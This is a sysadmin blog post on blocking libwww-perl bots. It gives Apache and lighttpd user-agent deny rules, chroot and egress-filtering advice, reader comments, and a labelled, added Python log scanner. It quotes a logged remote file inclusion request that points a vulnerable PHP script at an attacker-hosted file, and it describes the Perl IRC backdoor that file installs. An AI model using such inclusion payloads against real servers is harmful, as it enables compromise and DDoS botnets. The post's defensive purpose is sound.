The rise of bots, spammers, crack attacks and libwww-perl

Posted by Vivek Gite [Last updated: April 9, 2007]

libwww-perl (LWP) is a fine WWW client/server library for Perl. Unfortunately, this library is used by many script kiddies, crackers, and spam bots.

The following is a typical example that you will find in your Apache or lighttpd access.log file:

$ grep 'libwww-perl' access.log

OR

$ grep 'libwww-perl' /var/log/lighttpd/access.log

Output:

62.152.64.210 www.domain.com - [23/Oct/2006:22:24:37 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.someattackersite.com/list.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"

So someone is trying to attack your host and exploit a security hole to install a backdoor. yesno.phtml is a poorly written application that can run or include PHP code (list.txt) from a remote server. This code installs a Perl-based backdoor in /tmp or /dev/shm and sends a notification to an IRC server or bot master, i.e. the server is ready for attacks against other computers. This backdoor can flood or DDoS other victims' servers (it will also cost you tons of bandwidth). Usually the attacker hides behind zombie machines. Blocking by user agent can help, and in some cases the problem can be dropped altogether.

You will also notice libwww-perl/5.76 as the browser name (read as user agent). To avoid such attacks:
=> Block all libwww-perl user agents
=> Run the web server in a chrooted jail


How to block libwww-perl under Lighttpd web server?

Open the lighttpd.conf file:
# vi /etc/lighttpd/lighttpd.conf
Append the following lines to the main server or virtual hosting section:
$HTTP["useragent"] =~ "libwww-perl" {
url.access-deny = ( "" )
}

Save and close the file. Restart lighttpd:
# /etc/init.d/lighttpd restart


How to block libwww-perl under Apache web server?

Use the SetEnvIfNoCase directive (provided by mod_setenvif) in an .htaccess file to block the libwww-perl user agent. Open your .htaccess file and add the rule as follows:
SetEnvIfNoCase User-Agent "^libwww-perl" block_bad_bots
Deny from env=block_bad_bots

How do I verify that User-Agent libwww-perl is blocked?

Download this Perl script to your own workstation. Replace http://your-website.com/ with your site name:
$req = HTTP::Request->new(GET => 'http://your-website.com/');
Save and execute the Perl script:
$ chmod +x test-lwp.pl
$ ./test-lwp.pl

Output:

Error: 403 Forbidden

You should see a 403 Forbidden error, as your user agent is blocked by the server configuration.

Please note that blocking by user agent can help, but spammers spoof user agents. My personal experience shows that blocking libwww-perl saves bandwidth and drops potential threats by 50-80%.
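
Because the user agent can be spoofed, it also helps to look for the request pattern itself. The following is an added example, not part of the original article: it scans access-log lines for requests that pass a remote URL as a query parameter, whatever user agent they claim. The log layout is assumed from the sample line above, the function names are hypothetical, and the second and third sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

# Layout assumed from the article's sample line:
# ip vhost user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def remote_url_params(target):
    """Return names of query parameters whose value is a remote URL."""
    query = target.partition('?')[2]
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl percent-decodes once; unquote again to catch double encoding
        if REMOTE_URL_RE.match(unquote(value).strip()):
            hits.append(name)
    return hits

def scan(lines):
    """Return one finding per request that passes a remote URL in a parameter."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess
        params = remote_url_params(m['target'])
        if params:
            findings.append({
                'ip': m['ip'], 'agent': m['agent'], 'params': params,
                'served': m['status'] == '200',  # request was served: review first
            })
    return findings

SAMPLE_LOG = [
    # From the article:
    '62.152.64.210 www.domain.com - [23/Oct/2006:22:24:37 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.someattackersite.com/list.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"',
    # Constructed: same pattern, browser-like user agent, percent-encoded URL
    '192.0.2.10 www.domain.com - [23/Oct/2006:22:25:02 +0000] "GET /index.php?page=http%3A%2F%2Fexample.invalid%2Flist.txt%3F HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    # Constructed: harmless request that happens to come from LWP
    '198.51.100.7 www.domain.com - [23/Oct/2006:22:26:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Legitimate redirect or return-URL parameters will also match, so treat the hits as leads to review rather than as a block list.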

Another highly recommended solution is to run the web server in a chrooted jail. In a chrooted jail an attacker cannot install the backdoor, as a shell and utilities such as wget are not available to download the Perl code. I also recommend blocking all outgoing HTTP/FTP requests from your web server using iptables, or using a hardware-based firewall such as Cisco ASA firewalls.

The final, extreme solution is to put the entire root file system on read-only media such as a CD-ROM (or use a live CD). No attacker can bring down your web server if it is serving pages from read-only media (except by a DoS/DDoS attack).

What do you think? How do you block such attacks? Please share your nifty technique with us.

Discussion on This Article:

  1. Randal L. Schwartz Says:

    Blocking LWP::UserAgent by agent name is like painting a lock on your door and saying it’s secure. Dumb. Really dumb. Not worth the time, and surprised you suggested it.

  2. nixcraft Says:

    Randal,

    Blocking user agent can help, but spammers spoof user agents. Just suggested solution; there are tons of dumb spammers too, they don’t change their user agent, so I do block them :)

    Real solution is chrooted jail.

    Appreciate your post.

  3. DarkMindZ Says:

    Good one, I wrote a similar easier technique here:

    Blocking bots and scanners with htaccess

  4. mumuri Says:

    There is another solution: if this software reads all links in a page, you can just put a non-viewable link on the page, and when this link is called, you ban the IP of the bot.

Copyright © 2004-2008 nixCraft. All rights reserved - TOS/Disclaimer - Privacy policy - Sitemap - Powered by Open source software.